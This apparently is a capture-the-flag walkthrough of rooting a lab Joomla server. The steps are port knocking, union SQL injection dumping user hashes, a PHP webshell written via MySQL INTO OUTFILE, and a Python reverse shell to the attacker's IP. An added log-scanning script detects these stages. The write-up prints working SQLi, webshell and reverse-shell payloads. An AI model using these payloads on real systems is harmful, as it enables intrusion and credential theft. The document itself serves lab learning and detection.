1. Reconnaissance
As usual I started with netdiscover:
The next step was to scan the ports:
2. Enumeration
In reality I spent a bit of time here, as port 80 did not reveal anything and port 666 was filtered. I used a tool called knock-knock (https://github.com/pan0pt1c0n/knock-knock). After running it, port 666 showed as open. I examined the source code of the page and it was revealed to be Joomla. I enumerated the target further using the Metasploit module for Joomla plugins, since plugins are quite often vulnerable.
3. Exploitation
I was right: sectionid was vulnerable to SQL injection. As a next step I entered a quote to verify whether it was true:
Then I reviewed the Joomla documentation to understand in which table the user hashes are stored. I did hands-on SQL injection exploitation instead of using sqlmap. I found a field that was suitable for data exfiltration, enumerated tables, and so on. I used this request to extract information about users:
http://192.168.57.102:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1%20union%20select%201,concat(username,0x20,password)%20from%20jos_users--
This gave me hashes:
I cracked the hashes using Joomla_cracker.pl from https://gist.github.com/cobra-tn/2304218. The cracked hashes did not give me any new foothold, so I decided to use another SQLi option - retrieving files. By default the Joomla configuration file is located in the web root. I assumed that /var/www was the default path. After I retrieved the file, I tried the "root" username and password to log in to phpMyAdmin.
I was able to log in. Then I spent some time creating a limited shell. I used this video as an example: https://worldhack3r.wordpress.com/2013/05/06/upload-shell-in-phpmyadmin/. To cut a long story short: I created a database and a table in MySQL. Then I used the MySQL INTO OUTFILE command to write a PHP shell into the web root:
SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"
Then I used this shell to create a connection back to my machine using Python:
192.168.57.102:666/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.57.101%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
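The chain above (union-based extraction from jos_users, a cmd-parameter webshell, the Python reverse shell) leaves traces in the web server's access log. The following is an added example, not part of the original write-up, that scans constructed access-log lines for those stages; the IPs, paths and parameters follow the write-up, and load_file() is an assumption for the usual MySQL function behind the file-retrieval step.

```python
import re
from urllib.parse import unquote_plus

# Each stage of the chain in the write-up, as a regex over the URL-decoded request target.
# load_file() is an assumption: the usual MySQL function behind "retrieve files via SQLi";
# the write-up does not name the function it used.
STAGES = [
    ("sqli_union",     re.compile(r"union\s+(all\s+)?select", re.I)),
    ("sqli_file_read", re.compile(r"load_file\s*\(", re.I)),
    ("webshell_exec",  re.compile(r"[?&]cmd=", re.I)),
    ("reverse_shell",  re.compile(r"socket\.socket|subprocess|/bin/(ba)?sh", re.I)),
]
# Common/combined log prefix: client identd user [time] "METHOD target proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (client_ip, decoded_target, [stage names]) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status = m.groups()
    decoded = unquote_plus(target)  # payloads arrive %-encoded; match the decoded form
    hits = [name for name, pat in STAGES if pat.search(decoded)]
    return ip, decoded, hits

def scan(lines):
    """Map each client IP to the attack stages seen from it, in order of first sighting."""
    seen = {}
    for line in lines:
        res = classify(line)
        if res is None or not res[2]:
            continue
        stages = seen.setdefault(res[0], [])
        for h in res[2]:
            if h not in stages:
                stages.append(h)
    return seen

# Constructed sample log; IPs, paths and parameters follow the write-up.
SAMPLE_LOG = [
    '192.168.57.50 - - [06/May/2013:10:00:01 +0000] "GET /index.php?option=com_abc&view=abc&letter=AS&sectionid=1 HTTP/1.1" 200 4231',
    '192.168.57.101 - - [06/May/2013:10:03:12 +0000] "GET /index.php?option=com_abc&view=abc&letter=AS&sectionid=1%20union%20select%201,concat(username,0x20,password)%20from%20jos_users-- HTTP/1.1" 200 612',
    '192.168.57.101 - - [06/May/2013:10:41:55 +0000] "GET /cmd.php?cmd=id HTTP/1.1" 200 54',
    '192.168.57.101 - - [06/May/2013:10:42:30 +0000] "GET /cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.57.101%22,443))%27 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(f"{ip}: {' -> '.join(stages)}")  # 192.168.57.101: sqli_union -> webshell_exec -> reverse_shell
```

Only GET query strings show up in the access log; the INTO OUTFILE step was submitted through phpMyAdmin and would have to be caught in the MySQL general log or prevented outright by setting secure_file_priv.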
4. Privilege escalation
After a quick enumeration I tried several kernel exploits. The machine was rooted using the "RDS socket" exploit - https://www.exploit-db.com/exploits/15285/. I uploaded the exploit code to /tmp using wget, compiled it with the default gcc and got root.
Conclusions
In general the machine was not difficult; there were only a few tricky moments to overcome:
1. port knocking - understand that it is in use and find a way to bypass it
2. use SQL injection not only to dump hashes but also to enumerate files on the filesystem
3. shell in phpMyAdmin